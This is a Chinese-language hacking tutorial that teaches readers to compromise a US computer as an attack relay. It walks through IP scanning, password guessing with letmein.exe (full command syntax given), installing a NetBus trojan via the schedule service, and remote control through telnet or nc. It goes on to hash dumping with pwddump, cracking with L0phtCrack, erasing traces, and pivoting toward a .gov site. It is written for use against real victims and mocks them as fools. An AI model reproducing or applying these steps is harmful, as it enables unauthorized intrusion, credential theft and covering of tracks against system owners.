一般用户均为拨号上网,速度较慢,绝对不适合大数据量攻击,比如密码强攻等,而且很容易很容易暴露自己,留下攻击痕迹,给自己带来极大的危险,所以,建立自己的中间堡垒是迈向成功的第一步。所谓中间堡垒,实际上就是连接在高速网络上的远程计算机,我们在本地通过Telnet,控制远程计算机上运行的攻击程序,这样,没有直接对目标进行攻击,敌人很难发现,而且远程计算机有很宽的带宽,速度较快,减少攻击时间。比如在霉国(注:美国,下同),绝大多数计算机都是通过千兆网连接到Internet,其速度不比我们在局域网慢。
那么,怎么建立自己的中间堡垒呢?在霉国,上网计算机数量巨大,几乎有40%以上的计算机是相当容易攻破的,所以,我们只要想办法功入一台位于霉国的计算机,并成功的在其上安装木马程序及攻击工具程序,接下来就好好办多了。请看下面的我们的经历:
利用Pinger程序,查找霉国的一段IP地址,如果没有任何机器,再换一段,直到找到目标,如下:
可以发现,Ping程序在一连续的IP地址上,找到目标计算机的一些相关信息,比如:209.102.20.193 - SERVER,其中209.102.20.193为计算机的IP地址,SERVER为机器名,接下来,我们进入DOS,运行killusa编制的letmein.exe,如下:
letmein.exe 的参数为:
letmein.exe file://server/ -group -op pwd
其中-group 为:( -all -admin -users -domainadmin -domainusers -guests -domainguests)
-op 为:(-g: 攻击,-d 只显示用户)
pwd为:mypwd
例如:letmein file://111.111.111.111/ -all -g mypwd
(对\\111.111.111.111上所有用户攻击)
例如:letmein file://111.111.111.111/ -admin -g mypwd
(对\\111.111.111.111上管理员攻击)
例如:letmein file://111.111.111.111/ -all -d mypwd
(显示\\111.111.111.111上所有用户)
接下来,letmein程序开始取得SERVER的相关用户,并简单尝试其口令,非常幸运,SERVER操作系统为NT,killusa很快取得SERVER上管理员为Pearson的口令为Pearson,结果如下:
当然,您的运气也许没有这么好,没关系,反复试几次,终归会有一个笨蛋失误,我们以多年的经验保证您可以在霉国找到这么一台计算机!
接下来,继续在DOS状态下运行:
其实,这时,您已以管理员的身份登录到该机器上了,接下来,赶快将工具程序拷贝到该计算机上,如下:
程序已经复制到远程计算机上,那么如何启动木马程序ntsrv.exe呢,请看:
这样,在远程计算机时间13:30分(时间在letmein已显示,估计后延一点),SERVER上的SCHEDULE服务程序将启动ntsrv.exe,并监听端口:64321,当然,端口号可以根据自己的习惯,建议在200-65360之间选折。
OK,您已成功占领该计算机,启动Netbus客户端程序:netbus.exe,在host name/IP中填入:209.102.20.193,在Port中填入:64321,选折“Connect!”按钮,如下:
具体NetBus的用法,可以查看其Help文件,接下来,选折“Get Info”,如下:
可以判断其WIN NT安装在c:\winnt目录下,接下来,选折“App Redirect”,如下:
当然,端口可以自己选折,但建议尽量大点,如:61111,59999等,这样,你就可以通过Telenet.exe或nc.exe来控制远程计算机SERVER运行你的攻击程序,如下:
利用nc.exe的界面:
Telnet用法如下:telnet 209.102.20.193 54321
而且必须将终端-首选选项-本地响应 选上,利用Telnet.exe 的界面:
这样,你已在远程计算机上运行DOS窗口,并将你的运行程序结果返回到你的本地机器,因为程序是运行在远程计算机上,速度只要你ping以下霉国的站点,你就会发现不一样。
接下来,必须取得该站点的密码,已扩大战果,在telnet或nc中,运行pwddump.exe,如下:
然后,利用Netbus将server.lc下载到本地,利用L0phtCrack 2.5解出其他密码,如下:
得到了密码,接下来的事我就不用再说了,但千万注意保护好这个堡垒,不要在上面留下不该留下的垃圾,也千万不要删除上面的任何文件,攻击完后,一定要将相关现场恢复,如删除server.lc,pwddump.exe等文件。
这里只介绍攻击NT服务器的基本方法,攻击一个站点时,往往主站点很难进入,也不会有这种管理员的密码一猜就中,但不要泄气,用Pinger扫描其相差一个或几个C端地址,攻击其防范不严的相关机器,一步一步得到管理员的密码,如目标为:www.somesite.gov,其IP为:111.111.111.111,扫描出其所在C类地址所有IP,攻击其相关服务器或其工作人员站点机,比如www.somesite.gov管理员其中有:usasb,利用letmein无法得到管理员密码,但其有一台机器为:usasbclient,其中管理员有:administrator、test、usasb,利用letmein得到test的密码为空,采用上面的方法,得到usasb的密码,利用LC解出usasb的密码明码,ok,再用usasb进入www.somesite.gov,将其所有密码下载后,接下来killusa要睡觉去了!!! -) ....
要成为一名优秀的Hacker,必须有敏锐的洞察力和应变能力,必须对各种操作系统相当了解,并且有很好的编程水平,鉴于当前形势严峻,不做一名优秀的Hacker,入个门,也能取得好成绩,哈哈.....
